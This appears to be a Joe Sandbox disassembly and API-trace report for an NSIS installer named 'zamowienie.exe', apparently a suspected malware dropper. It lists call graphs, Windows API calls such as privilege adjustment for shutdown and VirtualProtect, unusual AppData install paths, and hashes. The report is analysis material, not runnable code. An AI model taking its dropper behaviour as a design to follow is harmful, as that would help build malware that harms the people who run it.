DefWindowProcA 5752->5754 5756 4010f3 5753->5756 5759 401179 5754->5759 5757 401073 CreateBrushIndirect FillRect DeleteObject 5756->5757 5758 4010fc 5756->5758 5757->5756 5760 401102 CreateFontIndirectA 5758->5760 5761 401167 EndPaint 5758->5761 5760->5761 5762 401112 6 API calls 5760->5762 5761->5759 5762->5761 5763 401502 5764 401507 5763->5764 5765 40152d 5763->5765 5766 402c3c 21 API calls 5764->5766 5766->5765 5767 401a83 5768 402c3c 21 API calls 5767->5768 5769 401a8c 5768->5769 5770 402c3c 21 API calls 5769->5770 5771 401a33 5770->5771 5772 403b85 5773 403b90 5772->5773 5774 403b94 5773->5774 5775 403b97 GlobalAlloc 5773->5775 5775->5774 5776 401588 5777 402a67 5776->5777 5780 40631c wsprintfA 5777->5780 5779 402a6c 5780->5779 5781 401b88 5782 402c5e 21 API calls 5781->5782 5783 401b8f 5782->5783 5784 402c3c 21 API calls 5783->5784 5785 401b98 wsprintfA 5784->5785 5786 402aea 5785->5786 5787 401d8a 5788 401d90 5787->5788 5789 401d9d GetDlgItem 5787->5789 5790 402c3c 21 API calls 5788->5790 5791 401d97 5789->5791 5790->5791 5792 401dde GetClientRect LoadImageA SendMessageA 5791->5792 5793 402c5e 21 API calls 5791->5793 5795 401e3f 5792->5795 5797 401e4b 5792->5797 5793->5792 5796 401e44 DeleteObject 5795->5796 5795->5797 5796->5797 5798 40278b 5799 402791 5798->5799 5800 402799 FindClose 5799->5800 5801 402aea 5799->5801 5800->5801 5802 40240d 5803 402c5e 21 API calls 5802->5803 5804 40241e 5803->5804 5805 402c5e 21 API calls 5804->5805 5806 402427 5805->5806 5807 402c5e 21 API calls 5806->5807 5808 402431 GetPrivateProfileStringA 5807->5808 4499 40168f 4500 402c5e 21 API calls 4499->4500 4501 401696 4500->4501 4502 402c5e 21 API calls 4501->4502 4503 40169f 4502->4503 4504 402c5e 21 API calls 4503->4504 4505 4016a8 MoveFileA 4504->4505 4506 4016b4 4505->4506 4507 4016bb 4505->4507 4509 401423 28 API calls 4506->4509 4511 40230f 4507->4511 4513 406751 FindFirstFileA 4507->4513 4509->4511 4514 406767 FindClose 4513->4514 4515 4016ca 4513->4515 4514->4515 
4515->4511 4516 406197 MoveFileExA 4515->4516 4517 4061b8 4516->4517 4518 4061ab 4516->4518 4517->4506 4520 406027 4518->4520 4521 406073 GetShortPathNameA 4520->4521 4522 40604d 4520->4522 4524 406192 4521->4524 4525 406088 4521->4525 4547 405f51 GetFileAttributesA CreateFileA 4522->4547 4524->4517 4525->4524 4527 406090 wsprintfA 4525->4527 4526 406057 CloseHandle GetShortPathNameA 4526->4524 4528 40606b 4526->4528 4529 406451 21 API calls 4527->4529 4528->4521 4528->4524 4530 4060b8 4529->4530 4548 405f51 GetFileAttributesA CreateFileA 4530->4548 4532 4060c5 4532->4524 4533 4060d4 GetFileSize GlobalAlloc 4532->4533 4534 4060f6 4533->4534 4535 40618b CloseHandle 4533->4535 4549 405fc9 ReadFile 4534->4549 4535->4524 4540 406115 lstrcpyA 4542 406137 4540->4542 4541 406129 4543 405eb6 4 API calls 4541->4543 4544 40616e SetFilePointer 4542->4544 4543->4542 4556 405ff8 WriteFile 4544->4556 4547->4526 4548->4532 4550 405fe7 4549->4550 4550->4535 4551 405eb6 lstrlenA 4550->4551 4552 405ef7 lstrlenA 4551->4552 4553 405ed0 lstrcmpiA 4552->4553 4554 405eff 4552->4554 4553->4554 4555 405eee CharNextA 4553->4555 4554->4540 4554->4541 4555->4552 4557 406016 GlobalFree 4556->4557 4557->4535 5823 401490 5824 405502 28 API calls 5823->5824 5825 401497 5824->5825 5826 401a12 5827 402c5e 21 API calls 5826->5827 5828 401a19 5827->5828 5829 402c5e 21 API calls 5828->5829 5830 401a22 5829->5830 5831 401a29 lstrcmpiA 5830->5831 5832 401a3b lstrcmpA 5830->5832 5833 401a2f 5831->5833 5832->5833 5834 404594 lstrcpynA lstrlenA 5835 401594 5836 4015a4 ShowWindow 5835->5836 5837 4015ab 5835->5837 5836->5837 5838 4015b9 ShowWindow 5837->5838 5839 402aea 5837->5839 5838->5839 4679 402198 4680 402c5e 21 API calls 4679->4680 4681 40219f 4680->4681 4682 402c5e 21 API calls 4681->4682 4683 4021a9 4682->4683 4684 402c5e 21 API calls 4683->4684 4685 4021b3 4684->4685 4686 402c5e 21 API calls 4685->4686 4687 4021c0 4686->4687 4688 402c5e 21 API calls 4687->4688 4689 4021ca 4688->4689 4690 40220c 
CoCreateInstance 4689->4690 4691 402c5e 21 API calls 4689->4691 4694 40222b 4690->4694 4696 4022d9 4690->4696 4691->4690 4692 401423 28 API calls 4693 40230f 4692->4693 4695 4022b9 MultiByteToWideChar 4694->4695 4694->4696 4695->4696 4696->4692 4696->4693 5847 402318 5848 402c5e 21 API calls 5847->5848 5849 40231e 5848->5849 5850 402c5e 21 API calls 5849->5850 5851 402327 5850->5851 5852 402c5e 21 API calls 5851->5852 5853 402330 5852->5853 5854 406751 2 API calls 5853->5854 5855 402339 5854->5855 5856 40234a lstrlenA lstrlenA 5855->5856 5857 40233d 5855->5857 5859 405502 28 API calls 5856->5859 5858 405502 28 API calls 5857->5858 5861 402345 5857->5861 5858->5861 5860 402386 SHFileOperationA 5859->5860 5860->5857 5860->5861 4697 40269a 4698 402c3c 21 API calls 4697->4698 4701 4026a4 4698->4701 4699 402712 4700 405fc9 ReadFile 4700->4701 4701->4699 4701->4700 4702 402714 4701->4702 4703 402724 4701->4703 4706 40631c wsprintfA 4702->4706 4703->4699 4705 40273a SetFilePointer 4703->4705 4705->4699 4706->4699 4707 405a9a ShellExecuteExA 5862 40239a 5863 4023a1 5862->5863 5866 4023b4 5862->5866 5864 406451 21 API calls 5863->5864 5865 4023ae 5864->5865 5865->5866 5867 405ad4 MessageBoxIndirectA 5865->5867 5867->5866 5868 402a1b 5869 402a22 5868->5869 5870 402a6e 5868->5870 5873 402c3c 21 API calls 5869->5873 5876 402a6c 5869->5876 5871 4067e6 5 API calls 5870->5871 5872 402a75 5871->5872 5874 402c5e 21 API calls 5872->5874 5875 402a30 5873->5875 5877 402a7e 5874->5877 5878 402c3c 21 API calls 5875->5878 5877->5876 5886 406411 5877->5886 5879 402a3f 5878->5879 5885 40631c wsprintfA 5879->5885 5881 402a8c 5881->5876 5890 4063fb 5881->5890 5885->5876 5887 40641c 5886->5887 5888 40643f IIDFromString 5887->5888 5889 406438 5887->5889 5888->5881 5889->5881 5893 4063e0 WideCharToMultiByte 5890->5893 5892 402aad CoTaskMemFree 5892->5876 5893->5892 5894 40149d 5895 4023b4 5894->5895 5896 4014ab PostQuitMessage 5894->5896 5896->5895 5897 401f1e 5898 402c5e 21 API calls 
5897->5898 5899 401f24 5898->5899 5900 402c5e 21 API calls 5899->5900 5901 401f2d 5900->5901 5902 402c5e 21 API calls 5901->5902 5903 401f36 5902->5903 5904 402c5e 21 API calls 5903->5904 5905 401f3f 5904->5905 5906 401423 28 API calls 5905->5906 5907 401f46 5906->5907 5914 405a9a ShellExecuteExA 5907->5914 5909 401f81 5910 40685b 5 API calls 5909->5910 5912 4027ed 5909->5912 5911 401f9b CloseHandle 5910->5911 5911->5912 5914->5909 4737 401fa0 4738 402c5e 21 API calls 4737->4738 4739 401fa6 4738->4739 4740 405502 28 API calls 4739->4740 4741 401fb0 4740->4741 4752 405a57 CreateProcessA 4741->4752 4744 401fd7 CloseHandle 4748 4027ed 4744->4748 4747 401fcb 4749 401fd0 4747->4749 4750 401fd9 4747->4750 4760 40631c wsprintfA 4749->4760 4750->4744 4753 401fb6 4752->4753 4754 405a8a CloseHandle 4752->4754 4753->4744 4753->4748 4755 40685b WaitForSingleObject 4753->4755 4754->4753 4756 406875 4755->4756 4757 406887 GetExitCodeProcess 4756->4757 4761 406822 4756->4761 4757->4747 4760->4744 4762 40683f PeekMessageA 4761->4762 4763 406835 DispatchMessageA 4762->4763 4764 40684f WaitForSingleObject 4762->4764 4763->4762 4764->4756 5915 402020 5916 402c5e 21 API calls 5915->5916 5917 402027 5916->5917 5918 4067e6 5 API calls 5917->5918 5919 402036 5918->5919 5920 40204e GlobalAlloc 5919->5920 5921 4020be 5919->5921 5920->5921 5922 402062 5920->5922 5923 4067e6 5 API calls 5922->5923 5924 402069 5923->5924 5925 4067e6 5 API calls 5924->5925 5926 402073 5925->5926 5926->5921 5930 40631c wsprintfA 5926->5930 5928 4020ae 5931 40631c wsprintfA 5928->5931 5930->5928 5931->5921 5932 401922 5933 401959 5932->5933 5934 402c5e 21 API calls 5933->5934 5935 40195e 5934->5935 5936 405b80 71 API calls 5935->5936 5937 401967 5936->5937 4875 4024a3 4876 402c5e 21 API calls 4875->4876 4877 4024b5 4876->4877 4878 402c5e 21 API calls 4877->4878 4879 4024bf 4878->4879 4892 402cee 4879->4892 4881 402aea 4882 4024f4 4885 402500 4882->4885 4887 402c3c 21 API calls 4882->4887 4884 402c5e 21 API calls 
4886 4024ed lstrlenA 4884->4886 4888 402522 RegSetValueExA 4885->4888 4896 403222 4885->4896 4886->4882 4887->4885 4889 402538 RegCloseKey 4888->4889 4889->4881 4893 402d09 4892->4893 4911 406272 4893->4911 4897 403231 SetFilePointer 4896->4897 4898 40324d 4896->4898 4897->4898 4915 40332a GetTickCount 4898->4915 4901 4032ea 4901->4888 4902 405fc9 ReadFile 4903 40326d 4902->4903 4903->4901 4904 40332a 46 API calls 4903->4904 4905 403284 4904->4905 4905->4901 4906 4032f0 ReadFile 4905->4906 4908 403293 4905->4908 4906->4901 4908->4901 4909 405fc9 ReadFile 4908->4909 4910 405ff8 WriteFile 4908->4910 4909->4908 4910->4908 4912 406281 4911->4912 4913 4024cf 4912->4913 4914 40628c RegCreateKeyExA 4912->4914 4913->4881 4913->4882 4913->4884 4914->4913 4916 403482 4915->4916 4917 403358 4915->4917 4918 402ee2 36 API calls 4916->4918 4928 4034a9 SetFilePointer 4917->4928 4925 403254 4918->4925 4920 403363 SetFilePointer 4922 403388 4920->4922 4922->4925 4926 405ff8 WriteFile 4922->4926 4927 403463 SetFilePointer 4922->4927 4929 403493 4922->4929 4932 40692b 4922->4932 4939 402ee2 4922->4939 4925->4901 4925->4902 4926->4922 4927->4916 4928->4920 4930 405fc9 ReadFile 4929->4930 4931 4034a6 4930->4931 4931->4922 4933 406950 4932->4933 4934 406958 4932->4934 4933->4922 4934->4933 4935 4069e8 GlobalAlloc 4934->4935 4936 4069df GlobalFree 4934->4936 4937 406a56 GlobalFree 4934->4937 4938 406a5f GlobalAlloc 4934->4938 4935->4933 4935->4934 4936->4935 4937->4938 4938->4933 4938->4934 4940 402ef0 4939->4940 4941 402f08 4939->4941 4942 402f00 4940->4942 4943 402ef9 DestroyWindow 4940->4943 4944 402f10 4941->4944 4945 402f18 GetTickCount 4941->4945 4942->4922 4943->4942 4947 406822 2 API calls 4944->4947 4945->4942 4946 402f26 4945->4946 4948 402f5b CreateDialogParamA ShowWindow 4946->4948 4949 402f2e 4946->4949 4947->4942 4948->4942 4949->4942 4954 402ec6 4949->4954 4951 402f3c wsprintfA 4952 405502 28 API calls 4951->4952 4953 402f59 4952->4953 4953->4942 4955 402ed5 4954->4955 
4956 402ed7 MulDiv 4954->4956 4955->4956 4956->4951 5938 401d23 5939 402c3c 21 API calls 5938->5939 5940 401d29 IsWindow 5939->5940 5941 401a33 5940->5941 5942 401925 5943 402c5e 21 API calls 5942->5943 5944 40192c 5943->5944 5945 405ad4 MessageBoxIndirectA 5944->5945 5946 401935 5945->5946 5947 4027a5 5948 4027ab 5947->5948 5949 4027af FindNextFileA 5948->5949 5951 4027c1 5948->5951 5950 402800 5949->5950 5949->5951 5953 4063be lstrcpynA 5950->5953 5953->5951 5954 406e26 5956 40695e 5954->5956 5955 4072c9 5956->5955 5956->5956 5957 4069e8 GlobalAlloc 5956->5957 5958 4069df GlobalFree 5956->5958 5959 406a56 GlobalFree 5956->5959 5960 406a5f GlobalAlloc 5956->5960 5957->5955 5957->5956 5958->5957 5959->5960 5960->5955 5960->5956 5961 4048a9 5962 4048b9 5961->5962 5963 4048df 5961->5963 5965 40445e 22 API calls 5962->5965 5964 4044c5 8 API calls 5963->5964 5966 4048eb 5964->5966 5967 4048c6 SetDlgItemTextA 5965->5967 5967->5963 5061 401bac 5062 401bb9 5061->5062 5063 401bfd 5061->5063 5064 401c41 5062->5064 5069 401bd0 5062->5069 5065 401c01 5063->5065 5066 401c26 GlobalAlloc 5063->5066 5067 406451 21 API calls 5064->5067 5074 4023b4 5064->5074 5065->5074 5080 4063be lstrcpynA 5065->5080 5068 406451 21 API calls 5066->5068 5070 4023ae 5067->5070 5068->5064 5081 4063be lstrcpynA 5069->5081 5070->5074 5083 405ad4 5070->5083 5073 401c13 GlobalFree 5073->5074 5076 401bdf 5082 4063be lstrcpynA 5076->5082 5078 401bee 5087 4063be lstrcpynA 5078->5087 5080->5073 5081->5076 5082->5078 5084 405ae9 5083->5084 5085 405b35 5084->5085 5086 405afd MessageBoxIndirectA 5084->5086 5085->5074 5086->5085 5087->5074 5968 4029af 5969 402c3c 21 API calls 5968->5969 5971 4029b5 5969->5971 5970 406451 21 API calls 5972 4027ed 5970->5972 5971->5970 5971->5972 5316 734029b1 5317 73402a01 5316->5317 5318 734029c1 VirtualProtect 5316->5318 5318->5317 5973 402631 5974 402c5e 21 API calls 5973->5974 5975 402638 5974->5975 5978 405f51 GetFileAttributesA CreateFileA 5975->5978 5977 402644 5978->5977 
5319 4025b5 5320 402c9e 21 API calls 5319->5320 5321 4025bf 5320->5321 5322 402c3c 21 API calls 5321->5322 5323 4025c8 5322->5323 5324 4025e3 RegEnumKeyA 5323->5324 5325 4025ef RegEnumValueA 5323->5325 5328 4027ed 5323->5328 5326 40260b RegCloseKey 5324->5326 5325->5326 5327 402604 5325->5327 5326->5328 5327->5326 5979 4014b7 5980 4014bd 5979->5980 5981 401389 2 API calls 5980->5981 5982 4014c5 5981->5982 5983 40283b 6005 405f51 GetFileAttributesA CreateFileA 5983->6005 5985 402842 5986 4028fe 5985->5986 5989 4028e6 5985->5989 5990 40285d GlobalAlloc 5985->5990 5987 402905 DeleteFileA 5986->5987 5988 402918 5986->5988 5987->5988 5992 403222 48 API calls 5989->5992 5990->5989 5991 402876 5990->5991 6006 4034a9 SetFilePointer 5991->6006 5993 4028f3 CloseHandle 5992->5993 5993->5986 5995 40287c 5996 403493 ReadFile 5995->5996 5997 402885 GlobalAlloc 5996->5997 5998 402895 5997->5998 5999 4028cf 5997->5999 6000 403222 48 API calls 5998->6000 6001 405ff8 WriteFile 5999->6001 6002 4028a2 6000->6002 6003 4028db GlobalFree 6001->6003 6004 4028c6 GlobalFree 6002->6004 6003->5989 6004->5999 6005->5985 6006->5995 6007 7340103d 6010 7340101b 6007->6010 6011 7340154b GlobalFree 6010->6011 6012 73401020 6011->6012 6013 73401024 6012->6013 6014 73401027 GlobalAlloc 6012->6014 6015 73401572 3 API calls 6013->6015 6014->6013 6016 7340103b 6015->6016

Control-flow Graph

• Executed
• Not Executed
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403514
• GetVersionExA.KERNEL32(?), ref: 0040353D
• GetVersionExA.KERNEL32(0000009C), ref: 00403554
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040361D
• #17.COMCTL32(?,?,0000000A,?), ref: 0040365A
• OleInitialize.OLE32(00000000), ref: 00403661
• SHGetFileInfoA.SHELL32(0041F910,00000000,?,?,00000000,?,?,0000000A,?), ref: 0040367F
• GetCommandLineA.KERNEL32(Noncomplacency,NSIS Error,?,?,0000000A,?), ref: 00403694
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\zamowienie.exe",00000020,"C:\Users\user\Desktop\zamowienie.exe",00000000,?,?,0000000A,?), ref: 004036CE
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,?,0000000A,?), ref: 004037C7
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,0000000A,?), ref: 004037D8
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004037E4
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,0000000A,?), ref: 004037F8
                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 00403800
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,0000000A,?), ref: 00403811
                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,0000000A,?), ref: 00403819
                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,?,0000000A,?), ref: 0040382D
                                                                                                                                              • OleUninitialize.OLE32(?,?,?,0000000A,?), ref: 004038D8
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004038F9
                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\zamowienie.exe",00000000,?,?,?,0000000A,?), ref: 00403908
                                                                                                                                              • wsprintfA.USER32 ref: 0040395F
                                                                                                                                              • GetFileAttributesA.KERNEL32(948,C:\Users\user\AppData\Local\Temp\,948,?,?), ref: 00403991
                                                                                                                                              • DeleteFileA.KERNEL32(948), ref: 0040399D
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,948,?,?), ref: 004039C9
                                                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\zamowienie.exe,948,?), ref: 004039DF
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00426800,00426800,?,948,00000000), ref: 00403A32
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?), ref: 00403A4F
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A56
                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A6A
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A89
                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AAE
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403ACF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                                                                                              • String ID: "$"C:\Users\user\Desktop\zamowienie.exe"$1033$948$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218$C:\Users\user\Desktop$C:\Users\user\Desktop\zamowienie.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$Noncomplacency$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                              • API String ID: 2956269667-3261695512
                                                                                                                                              • Opcode ID: b8906a635698c96d709144620d147003707e09af1145772372227047e552c961
                                                                                                                                              • Instruction ID: 37149e310ed48336178e261d9096f0fa44b5e9b365965d583ffb66409b90e883
                                                                                                                                              • Opcode Fuzzy Hash: b8906a635698c96d709144620d147003707e09af1145772372227047e552c961
                                                                                                                                              • Instruction Fuzzy Hash: 68F10870A00254AADB21AFA59D49BAF7FB8AF41306F0440BFF941B61D2D77C4645CB2E

                                                                                                                                              Control-flow Graph: function at 00405B80 (graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405BA9
                                                                                                                                              • lstrcatA.KERNEL32(00421958,\*.*,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405BF1
                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C12
                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C18
                                                                                                                                              • FindFirstFileA.KERNELBASE(00421958,?,?,?,0040A014,?,00421958,?,?,75923410,75922EE0,"C:\Users\user\Desktop\zamowienie.exe"), ref: 00405C29
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405CD6
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405CE7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$\*.*
                                                                                                                                              • API String ID: 2035342205-1771764101
                                                                                                                                              • Opcode ID: 1c34df41f225ee6f3a1e1bb879dfece31770cb0a1fee5791fc0255ede9351830
                                                                                                                                              • Instruction ID: 36a6610349cd84d5fd36e12b5afcc6e5fbc36712f53838f94894807d8d85e247
                                                                                                                                              • Opcode Fuzzy Hash: 1c34df41f225ee6f3a1e1bb879dfece31770cb0a1fee5791fc0255ede9351830
                                                                                                                                              • Instruction Fuzzy Hash: 7F51C330804B4466EB216B65CC49BAF7A78DF42754F14817BF852751D2C73C8982DF5A
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040221D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004022CF
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218, xrefs: 0040225D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218
                                                                                                                                              • API String ID: 123533781-1600892969
                                                                                                                                              • Opcode ID: 197a96f9d76337c7ea3fda3028378c64bae789d34cc9f02246278df0d2071d2a
                                                                                                                                              • Instruction ID: 009ee6b37e18c92ff8e208b0b517b51024f673be5c58238fecc1f6f88d24fa56
                                                                                                                                              • Opcode Fuzzy Hash: 197a96f9d76337c7ea3fda3028378c64bae789d34cc9f02246278df0d2071d2a
                                                                                                                                              • Instruction Fuzzy Hash: 17511B71A00218AFDF00DFA4C988A9D7BB5FF48314F2045BAF515FB2D1DA799981CB54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f773ac2e5aa11c7bf09cdfc96604597c9e88ef4b16e15b36fd805824a913d03c
                                                                                                                                              • Instruction ID: 1af9d468556d524f955ff30d05e21ad9cfee14d1e3ce6751349f8fa2a58e4811
                                                                                                                                              • Opcode Fuzzy Hash: f773ac2e5aa11c7bf09cdfc96604597c9e88ef4b16e15b36fd805824a913d03c
                                                                                                                                              • Instruction Fuzzy Hash: D4F19970D04229CBDF28CFA8C8946ADBBB1FF05305F14816ED856BB281C7386A86DF45
                                                                                                                                              APIs
                                                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
                                                                                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
